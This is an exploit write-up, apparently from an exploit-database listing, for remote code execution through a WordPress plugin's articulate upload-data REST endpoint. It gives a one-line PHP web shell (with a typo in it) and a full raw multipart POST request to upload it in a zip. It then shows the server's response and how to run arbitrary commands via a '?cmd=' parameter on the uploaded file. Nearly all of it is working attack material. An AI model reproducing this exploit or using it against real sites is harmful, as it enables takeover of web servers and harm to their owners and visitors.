# Authorized RCE : https://cxsecurity.com/issue/WLB-2019060137 # Author : Con7ext 1. Create File > index.php / whatever and index.html EX: INDEX.html <html> HELLO WORLD </html> EX: INDEX.php <?php system($_GET[cmd]; ?> 2. Compress it to zip 3. Make Request to /wordpress/index.php/wp-json/articulate/v1/upload-data POST /wordpress/index.php/wp-json/articulate/v1/upload-data HTTP/1.1 Host: movie.boniw.io User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: */* Accept-Language: id,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://movie.boniw.io/wordpress/wp-admin/post.php?post=16&action=edit Content-Type: multipart/form-data; boundary=---------------------------57052814523281 Content-Length: 808294 Connection: close -----------------------------57052814523281 Content-Disposition: form-data; name="name" whatever.zip -----------------------------57052814523281 Content-Disposition: form-data; name="chunk" 2 -----------------------------57052814523281 Content-Disposition: form-data; name="chunks" 3 -----------------------------57052814523281 Content-Disposition: form-data; name="file"; filename="blob" Content-Type: application/octet-stream ANY 4. You will see the message like : {"OK": 1, "info": "Upload Complete!", "folder" : "kntl", "path" : "\/wp-content\/uploads\/articulate_uploads\/kntl\/index.html", "name" : {"file_name":"index.html","status":"index_html_file_found"}, "target": "/var/www/html/wordpress/wp-content/uploads/articulate_uploads/kntl"} 5. The you can see site.com/PATH ( site.com/wp-content/uploads/articulate_uploads/kntl/index.php ) 6. The you can run command ( JUST ADDING ?cmd EX: site.com/wp-content/uploads/articulate_uploads/kntl/index.php?cmd={COMMAND} )